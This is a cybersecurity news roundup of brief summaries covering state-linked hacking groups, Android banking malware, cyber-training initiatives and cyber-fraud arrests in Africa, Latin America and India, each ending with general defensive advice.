A new Iranian threat group, dubbed "Cyber Toufan," has emerged with sophisticated cyberattack campaigns targeting organizations across various sectors using custom-built malware and backdoors. According to cybersecurity researchers, this group is focused on espionage and data exfiltration operations, particularly against government, defense, and critical infrastructure entities. The hackers employ advanced spear-phishing techniques and exploit known vulnerabilities in enterprise software to gain initial access. Once inside, they deploy backdoors like "PowerDash" to maintain persistent access and extract sensitive data. Analysts suggest the group's operations are politically motivated and aligned with Iran's strategic interests, possibly under state sponsorship. The malware's obfuscation techniques and command-and-control infrastructure indicate a high level of operational maturity. As global tensions rise, cybersecurity experts warn that such state-linked threat actors will likely escalate their campaigns, urging organizations to patch known vulnerabilities, enhance detection capabilities, and monitor for indicators of compromise linked to Cyber Toufan's tactics and tools.
INE Security and RedTeam Hacker Academy Forge Partnership to Advance Cyber Training
INE Security and RedTeam Hacker Academy have announced a strategic partnership to enhance cybersecurity education and professional training worldwide. This collaboration aims to bridge the skills gap in the cybersecurity industry by offering high-quality, hands-on training programs tailored to beginners, professionals, and enterprise teams. The alliance combines INE's robust e-learning platform and global reach with RedTeam's expertise in offensive security and practical workshops, particularly in the Asia-Pacific and Middle East regions. Together, they plan to roll out a unified curriculum that includes penetration testing, ethical hacking, incident response, and cloud security courses. Students will have access to virtual labs, certification tracks, and expert-led sessions designed to simulate real-world cyber threats. Both organizations emphasize the importance of continuous education in combating evolving cyber threats and building a global workforce capable of defending critical systems. This partnership reflects a growing trend of industry collaboration aimed at solving the persistent shortage of skilled cybersecurity professionals.
Cybersecurity Skills Development in Africa Undermined by Lack of Funding and Political Commitment
Africa's cybersecurity landscape is being threatened not only by external attacks but also by a critical shortage of skilled professionals, largely due to limited investment and weak political will. A new report highlights the continent's struggle to build a sustainable cybersecurity workforce amid rising digital adoption and increasing cyber threats. Despite the growing demand for trained personnel in both the public and private sectors, governments across the region have been slow to prioritize cybersecurity education and capacity building. Most initiatives remain fragmented, underfunded, and dependent on international donors. Experts warn that without systemic reforms and long-term investment in training programs, African nations risk becoming soft targets for cybercriminals and state-sponsored actors. There is a pressing need for coordinated strategies that include curriculum development, academic-industry partnerships, and incentive structures to retain local talent. As cyber threats grow in scale and sophistication, Africa's digital resilience hinges on addressing this foundational skills deficit.
Microsoft Launches Regional Cybersecurity Initiative Across Africa
Microsoft has launched a continent-wide cybersecurity initiative aimed at strengthening digital defenses across Africa through regional partnerships, skills training, and infrastructure investment. The program, part of Microsoft's broader Digital Development strategy, focuses on collaboration with local governments, universities, and private sector stakeholders to build cyber resilience. Key components include setting up cybersecurity skilling centers, supporting regulatory frameworks, and enhancing early threat detection capabilities. Microsoft also plans to work closely with law enforcement agencies to combat cybercrime and foster secure cloud adoption. The initiative acknowledges Africa's increasing internet penetration and digital transformation, which has made the region a growing target for cyberattacks. By bolstering local talent and security practices, Microsoft aims to create a sustainable security ecosystem that supports economic growth and public trust. This strategic move not only strengthens Microsoft's market presence but also aligns with global efforts to address cybersecurity gaps in underserved and emerging digital economies.
EFCC Warns of Insider-Supported Cyberattacks Targeting Nigerian Banks
Nigeria's Economic and Financial Crimes Commission (EFCC) has issued a warning about an alarming rise in insider-assisted cyberattacks on Nigerian banks. According to the commission, many of these attacks are facilitated by employees who exploit internal access privileges to bypass security controls, steal data, and assist external hackers. This trend poses a significant threat to the nation's financial infrastructure, especially as digital banking continues to expand. The EFCC revealed that some staff members are either coerced or voluntarily participate in these schemes, underscoring the need for stronger internal monitoring, access control, and employee vetting. The agency is now working with the Central Bank of Nigeria and financial institutions to introduce stricter cybersecurity protocols and mandatory staff training. This development has sparked calls for banks to prioritize zero-trust architectures and robust insider threat detection tools. The EFCC also urged the public to remain vigilant against phishing and other fraud vectors tied to these coordinated attacks.
Latin America
$93 Billion Stolen via Hijacked User Cookies Fuels Rising Cybercrime Surge
A staggering $93 billion worth of digital assets has reportedly been stolen through hijacked user cookies, underscoring the growing threat posed by session hijacking attacks. Cybercriminals are increasingly using information-stealing malware to extract authentication cookies from browsers, enabling them to bypass login credentials and access victims' online accounts. These cookies, once exfiltrated, are sold on dark web markets or used directly for financial fraud, corporate espionage, and unauthorized access to cloud services. The scale of the theft illustrates how effective cookie-based attacks have become in evading traditional security measures like two-factor authentication. Experts warn that many organizations are unaware of these stealthy compromises, which can persist undetected for extended periods. Cybersecurity professionals are urging users and businesses to implement stronger session management protocols, regularly clear browser cookies, and adopt endpoint detection solutions to mitigate these risks. The report highlights a pressing need for modern security architectures that prioritize identity protection and anomaly detection.
Fake Mobile Invoice Apps Spread Malware to Steal Users' Banking Credentials
A new wave of mobile malware is targeting users by disguising itself as legitimate invoice applications, with the intent of stealing sensitive banking information. Kaspersky researchers uncovered this campaign, which primarily affects Android users and employs phishing techniques to trick victims into downloading malicious apps. Once installed, the malware overlays legitimate banking applications with fake login screens to capture credentials and intercept two-factor authentication codes. The malware also has keylogging and screen recording capabilities, making it highly effective in data theft. The deceptive use of business-related themes like invoices increases the likelihood of victims trusting and interacting with the malware. Kaspersky warns that the attackers are leveraging increasingly sophisticated methods to avoid detection, such as dynamic command-and-control channels and permission abuse. Users are advised to avoid downloading apps from unofficial sources, review app permissions critically, and use reputable mobile security solutions to defend against this evolving mobile threat landscape.
Zanubis Android Malware Campaign Harvests Banking Credentials from Latin American Users
A new Android malware strain named "Zanubis" has been detected targeting users in Latin America, designed specifically to harvest banking credentials through advanced social engineering and device control techniques. Researchers revealed that Zanubis impersonates legitimate financial apps to deceive victims into granting accessibility permissions, allowing the malware to take full control of the infected device. It can record keystrokes, capture screen content, and even interact with banking applications in real-time to bypass security measures. Notably, Zanubis can also deactivate legitimate antivirus tools and ensure persistence by exploiting system settings. This campaign appears to be regionally focused, with a growing list of financial institutions in the crosshairs. The malware's modular structure suggests ongoing development and adaptability for broader use. Security experts urge Android users, particularly in Latin America, to update their systems regularly, download apps only from trusted sources like Google Play, and stay alert to suspicious app behaviors or permissions prompts.
Special Focus on India
Two Arrested in ₹69 Lakh Cyber Fraud Case in Rajkot
Rajkot police have apprehended two individuals involved in a cyber fraud case amounting to ₹69 lakh, in which the accused duped multiple victims through fake online investment platforms. The suspects created fraudulent websites and used social media to lure victims by promising high returns on cryptocurrency and stock investments. Once funds were transferred, the fraudsters cut all communication, making it difficult for victims to recover their money. The police, following digital footprints and financial trails, traced the perpetrators and recovered incriminating evidence, including digital devices and bank records. The case reflects a growing trend in tech-enabled financial scams in India, where cybercriminals exploit people's aspirations for quick financial gains. Authorities have urged the public to remain vigilant and verify investment platforms before making any transactions. Law enforcement is now broadening the investigation to track more individuals possibly connected to this interstate cybercrime network and prevent future occurrences.
Chinese Surveillance Allegations Trigger Alarm in Indian Cyber Circles
India's intelligence community has raised alarms over widespread Chinese surveillance activities allegedly targeting sensitive infrastructure and communication networks, sparking a wave of scrutiny across the surveillance technology sector. According to a Reuters investigation, Indian authorities have begun intensifying checks on equipment and software originating from Chinese firms amid concerns of data exfiltration, espionage, and critical infrastructure vulnerabilities. Industry insiders report that surveillance systems sourced from China are under active review, and several deployments may be suspended or replaced with alternatives. The heightened scrutiny follows previous border tensions and rising geopolitical rivalry, accelerating India's push for indigenous solutions and stricter import controls. National cybersecurity agencies are now advising private firms and government departments to audit all foreign surveillance hardware and software, with a focus on data sovereignty. This incident underlines how geopolitical tensions can influence cybersecurity strategy and national policy, prompting governments to reassess foreign dependencies in critical technology ecosystems.
Asian School of Cyber Laws and GLC Mumbai Launch Advanced Cyber Law Program
The Asian School of Cyber Laws, in collaboration with Government Law College (GLC) Mumbai, has launched an Advanced Program on Cyber Law to address the growing need for legal professionals equipped with cybersecurity expertise. The initiative is designed for lawyers, policymakers, and technologists aiming to deepen their understanding of digital rights, cybercrime, privacy legislation, and emerging tech regulations such as AI governance and data protection. The course curriculum includes case studies, practical legal frameworks, and insights from global cybersecurity trends. With cybercrime on the rise and increasing overlap between technology and law, this program seeks to bridge the gap in legal education and build a robust talent pipeline for cyber law specialists in India. The organizers emphasize that India's expanding digital infrastructure necessitates stronger legal safeguards, and trained professionals will play a crucial role in shaping and enforcing cyber jurisprudence in both public and private sectors.
APT36 SideCopy Hackers Intensify Targeting of India's Critical Infrastructure
APT36, a Pakistan-linked threat actor also known as SideCopy, has ramped up cyber espionage campaigns against India's critical infrastructure using highly customized malware and deceptive phishing tactics. Security researchers report that the group is exploiting vulnerabilities in legacy systems and deploying tailored payloads to infiltrate government and defense networks. Recent attacks have been traced to spear-phishing emails posing as government officials or trusted vendors, delivering malware designed to extract credentials, documents, and network configurations. The group's operations align with geopolitical motives and long-term surveillance goals, particularly focused on defense research, foreign affairs, and energy sectors. Analysts highlight that APT36 is evolving its tradecraft, including adopting evasion techniques and fileless malware to bypass detection. The Indian government has elevated its cyber alert level and issued advisories to critical sector operators. This campaign underscores the persistent and politically motivated nature of advanced persistent threats targeting national security infrastructure.
Odisha Crime Branch Arrests Two in ₹1.08 Crore Cyber Fraud Case
Odisha's Crime Branch has arrested two individuals linked to a cyber fraud scheme worth ₹1.08 crore, involving sophisticated phishing and identity theft. The accused allegedly impersonated bank officials to dupe victims into sharing OTPs and banking credentials under the guise of resolving KYC issues. Once obtained, they used the data to siphon off large sums from victims' accounts. Investigations revealed the use of multiple fake SIM cards and fraudulent bank accounts across several states, pointing to a well-organized cybercriminal network. The authorities seized mobile devices, SIM cards, and laptops containing transaction data. The case highlights the alarming scale of financial cyber fraud in India, particularly those exploiting social engineering tactics. Officials emphasized the importance of public awareness and digital literacy in combating such crimes. The Crime Branch has widened its investigation, anticipating further arrests and uncovering links to larger interstate or possibly international fraud syndicates.
Gurgaon Sextortion Cybercrime Network Busted; 55 Arrested for ₹840 Crore Scam
In a major crackdown, Indian law enforcement has dismantled a massive cybercrime syndicate operating out of Gurgaon involved in sextortion frauds and investment scams, with total estimated fraud exceeding ₹840 crore. Police arrested 55 individuals and recovered over 1,200 mobile phones, hundreds of fake SIM cards, and digital tools used to blackmail victims. The gang allegedly tricked individuals into compromising video calls and then extorted them by threatening to share the footage unless large sums were paid. In parallel, they also operated fraudulent investment apps promising high returns, luring victims with fake testimonials and social media promotions. Authorities believe this network had a widespread victim base across India and possibly abroad. Cyber police are now working to trace financial flows and dismantle associated digital infrastructure. This case underscores the increasing sophistication and scale of cyber frauds in India, demanding improved public education, stricter digital KYC enforcement, and inter-agency coordination.
Integrated Cybersecurity Solution Lab to Be Built in Goa at ₹89.4 Crore
The Indian government has approved the establishment of an Integrated Cybersecurity Solution Lab in Goa, with an estimated investment of ₹89.4 crore. The lab aims to enhance national cybersecurity preparedness by developing indigenous solutions, conducting advanced research, and training skilled personnel in cyber defense and response. Planned under the National Cyber Security Strategy framework, the facility will focus on simulating real-time cyberattack scenarios, conducting vulnerability assessments, and testing defense technologies across sectors such as defense, power, and finance. The initiative reflects a strategic push towards strengthening India's cyber infrastructure amid rising threats from both domestic and international threat actors. Officials highlight that the lab will also collaborate with academic institutions, start-ups, and defense agencies to foster innovation in cybersecurity tools and protocols. This project is part of broader efforts to reduce dependency on foreign cybersecurity solutions and to build a resilient national cyber ecosystem grounded in self-reliance and robust capability.
Senior Citizen in Bengaluru Loses ₹2.5 Lakh to Cyber Fraud
A 70-year-old senior citizen in Bengaluru has fallen victim to cyber fraud, losing ₹2.5 lakh after being tricked by scammers posing as bank officials. The victim received a call warning of a potential account freeze due to incomplete KYC compliance and was prompted to share personal and banking details to avoid penalties. Believing the call to be legitimate, he shared sensitive credentials, which were then used to conduct unauthorized transactions. The incident was reported to the police, who have registered a cybercrime case and are tracking the fraudsters through call records and financial trails. This case is a stark reminder of the growing number of elderly individuals being targeted in tech-enabled scams due to lower digital literacy. Authorities are urging families to educate senior members on the dangers of sharing personal information and to use digital tools like transaction alerts and account freezing features to mitigate such risks.
Wedding Invite Scam Uses Fake APK Files to Hijack Phones and Steal Data
Cybercriminals are exploiting social occasions by distributing fake wedding invitation APK files that install malware on victims' phones to steal sensitive banking data. Victims receive messages with links disguised as wedding invites, encouraging them to download the attached app file. Upon installation, the malware gains access to SMS, contacts, and banking apps, enabling attackers to intercept OTPs and conduct unauthorized financial transactions. Security experts have traced the malware to known financial cybercrime groups that frequently update their techniques to bypass detection. With increasing reliance on digital communication for personal events, this scam is catching many off guard, especially those unfamiliar with APK file risks. Authorities have issued public warnings advising users to only download apps from official platforms like Google Play Store and to avoid clicking unknown links, even from seemingly familiar contacts. This incident highlights the evolving tactics of cybercriminals and the importance of app hygiene and mobile device security.
Bengaluru Woman Loses ₹7.5 Lakh in Remote Job Cyber Scam
A woman from Bengaluru searching for a work-from-home job was scammed out of ₹7.5 lakh by fraudsters posing as recruiters. She responded to an online job posting and was asked to pay "processing fees" and "security deposits" in phases, all under the pretense of onboarding procedures for a remote role. The scammers created fake websites and impersonated HR representatives of reputed firms, maintaining convincing communication throughout the process. Realizing she had been duped, she filed a police complaint, and a cybercrime investigation is now underway. Authorities recovered digital trails including WhatsApp chats, forged appointment letters, and transaction details. This scam is part of a growing trend where fraudsters exploit rising demand for remote work by leveraging fake job offers. Law enforcement and cybersecurity officials are urging job seekers to verify opportunities through official company portals and refrain from paying upfront money for employment processing or documentation.
Phishing Syndicate Busted in Morigaon; 7,000 Fake SIMs, 265 Arrested
A major cybercrime crackdown in Morigaon, Assam, led to the arrest of 265 individuals involved in a phishing and identity fraud syndicate using over 7,000 fake SIM cards. The gang orchestrated widespread scams across India by obtaining SIMs through forged documents, which were then used for phishing calls, fake UPI registrations, and OTP interception. Police raids uncovered a large number of electronic devices, SIM card activation kits, and digital evidence of financial fraud. Authorities believe the syndicate was responsible for scams involving fake job offers, lottery winnings, and impersonation of government officials. This bust reflects the scale of SIM-enabled fraud and its connection to wider cybercriminal operations. Telecom regulators are now under pressure to strengthen KYC norms and conduct stringent checks on SIM issuance. The operation is considered a significant step in dismantling organized cybercrime rings exploiting telecom loopholes and endangering national digital trust and financial systems.